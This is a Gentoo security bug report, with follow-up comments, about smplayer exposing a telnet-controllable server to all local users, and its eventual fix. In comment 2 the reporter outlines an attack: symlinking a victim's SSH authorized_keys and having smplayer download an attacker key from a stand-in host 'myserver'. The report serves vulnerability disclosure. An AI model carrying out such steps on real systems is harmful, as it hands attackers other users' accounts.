Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 326449

Summary: <media-video/smplayer-0.8.0: local denial of service
Product: Gentoo Security Reporter: ta2002 <throw_away_2002>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor CC: kensington
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard: B3 [glsa]
Package list:
Runtime testing required: ---
Bug Depends on: 417979    
Bug Blocks:    

Description ta2002 2010-07-01 13:16:38 UTC
I have probably misdescribed this, but I don't really know HOW to describe it other than one of the most idiotic things I have ever seen.

Running smplayer (apparently there is no way to turn off this "feature") starts a server that ANY local user can telnet to and control.

I am not sure how much actual damage one can do (other than a lot of mischief), but the available remote functions include:

open_file
open_directory
open_playlist
open_vcd
open_audio_cd
open_dvd
open_dvd_folder
open_url
close
clear_recents
edit_tv_list
jump_tv_list
next_tv
previous_tv
tv_menu
edit_radio_list
jump_radio_list
next_radio
previous_radio
radio_menu
play
play_or_pause
pause
pause_and_frame_step
stop
frame_step
rewind1
rewind2
rewind3
forward1
forward2
forward3
set_a_marker
set_b_marker
clear_ab_markers
repeat
jump_to
normal_speed
halve_speed
double_speed
dec_speed
inc_speed
dec_speed_4
inc_speed_4
dec_speed_1
inc_speed_1
fullscreen
compact
video_equalizer
screenshot
multiple_screenshots
video_preview
flip
mirror
motion_vectors
postprocessing
autodetect_phase
deblock
dering
add_noise
add_letterbox
upscaling
audio_equalizer
mute
decrease_volume
increase_volume
dec_audio_delay
inc_audio_delay
audio_delay
load_audio_file
unload_audio_file
extrastereo_filter
karaoke_filter
volnorm_filter
load_subs
unload_subs
dec_sub_delay
inc_sub_delay
sub_delay
dec_sub_pos
inc_sub_pos
dec_sub_scale
inc_sub_scale
dec_sub_step
inc_sub_step
use_ass_lib
use_closed_caption
use_forced_subs_only
subtitle_visibility
show_find_sub_dialog
upload_subtitles
show_playlist
show_file_properties
show_preferences
show_mplayer_log
show_smplayer_log
faq
cl_options
tips
about_qt
about_smplayer
play_next
play_prev
move_up
move_down
move_left
move_right
inc_zoom
dec_zoom
reset_zoom
auto_zoom
zoom_169
zoom_235
exit_fullscreen
next_osd
dec_contrast
inc_contrast
dec_brightness
inc_brightness
dec_hue
inc_hue
dec_saturation
inc_saturation
dec_gamma
inc_gamma
next_video
next_audio
next_subtitle
next_chapter
prev_chapter
toggle_double_size
reset_video_equalizer
reset_audio_equalizer
show_context_menu
next_aspect
next_wheel_function
show_filename
toggle_deinterlacing
osd_none
osd_seek
osd_timer
osd_total
denoise_none
denoise_normal
denoise_soft
size_50
size_75
size_100
size_125
size_150
size_175
size_200
size_300
size_400
deinterlace_none
deinterlace_l5
deinterlace_yadif0
deinterlace_yadif1
deinterlace_lb
deinterlace_kern
channels_stereo
channels_surround
channels_ful51
stereo
left_channel
right_channel
aspect_detect
aspect_1:1
aspect_3:2
aspect_4:3
aspect_5:4
aspect_14:9
aspect_14:10
aspect_16:9
aspect_16:10
aspect_2.35:1
aspect_none
rotate_none
rotate_clockwise_flip
rotate_clockwise
rotate_counterclockwise
rotate_counterclockwise_flip
on_top_always
on_top_never
on_top_playing
toggle_stay_on_top
dvdnav_up
dvdnav_down
dvdnav_left
dvdnav_right
dvdnav_menu
dvdnav_select
dvdnav_prev
dvdnav_mouse
speed_menu
ab_menu
videotrack_menu
videosize_menu
zoom_menu
aspect_menu
deinterlace_menu
videofilter_menu
rotate_menu
ontop_menu
audiotrack_menu
audiofilter_menu
audiochannels_menu
stereomode_menu
subtitlestrack_menu
titles_menu
chapters_menu
angles_menu
programtrack_menu
osd_menu
quit
show_tray_icon
restore/hide
pl_open
pl_save
pl_play
pl_next
pl_prev
pl_move_up
pl_move_down
pl_repeat
pl_shuffle
pl_preferences
pl_add_current
pl_add_files
pl_add_directory
pl_remove_selected
pl_remove_all
pl_edit
timeslider_action
volumeslider_action
timelabel_action
rewindbutton_action
forwardbutton_action
toggle_video_info
toggle_frame_counter
show_main_toolbar
show_language_toolbar

It seems there is the ability to retrieve and save files as another user, which is not really something I want in any program I am running.
Comment 1 ta2002 2010-07-01 13:28:44 UTC
Oops. I guess this can be turned off my setting:

use_single_instance=false

in ~/.config/smplayer/smplayer.ini

It still (at least) merits a warning when installed (assuming people read them).
Comment 2 ta2002 2012-01-02 01:06:51 UTC
I am a bit surprised that nothing has been done on this in eighteen months. With the release of a new version (0.6.10), it seems like a good time to address it.

Given that one can download arbitrary files as the user running smplayer, it is easy to compromise the account of the user running smplayer.

If ssh is in use on the machine, it is absolutely trivial:

cd /tmp
ln -s /home/victim/.ssh/authorized_keys mypublickey
telnet to smplayer and download http://myserver/mypublickey with permissions of the victim

If a bonehead like me can figure this out, I shudder to think what someone who is reasonably clever can do.
Comment 3 S├ębastien P. 2012-01-10 18:22:44 UTC
I did not understand everything of your demonstration (I am probably more bonehead than you :p).

Since it's a SMPlayer's problem, have you post a bug or something like that on the official website?
Comment 4 ta2002 2012-01-11 11:15:29 UTC
(In reply to comment #3)
> I did not understand everything of your demonstration (I am probably more
> bonehead than you :p).

Basically, if one can write files as another user, one can overwrite things such as ssh keys (and replacing authorized_keys with a malicious user's key means that the malicious user can then log in as the victim).

> Since it's a SMPlayer's problem, have you post a bug or something like that on
> the official website?

I haven't. This appears to be a "feature" they are proud of, and while it seems like an idiocy to me, there is always a significant chance that I don't know what I am talking about.
Comment 5 Michael Palimaka (kensington) gentoo-dev 2012-09-06 08:05:32 UTC
As of smplayer-0.8.0 (which is currently the only version in the tree), the network access has been replaced with a named local socket.

We therefore are no longer affected by the described issue.
Comment 6 Ben de Groot (RETIRED) gentoo-dev 2012-09-06 10:02:34 UTC
smplayer2, which is a fork of smplayer-0.7, might still be affected.
Comment 7 Michael Palimaka (kensington) gentoo-dev 2012-09-06 10:11:16 UTC
(In reply to comment #6)
> smplayer2, which is a fork of smplayer-0.7, might still be affected.

It appears to be.
Comment 8 Sean Amoss (RETIRED) gentoo-dev Security 2012-09-17 21:21:20 UTC
Stabilization was completed in bug #417979. 

GLSA vote: no.
Comment 9 Tim Sammut (RETIRED) gentoo-dev 2012-09-20 23:48:35 UTC
GLSA Vote: no too, closing.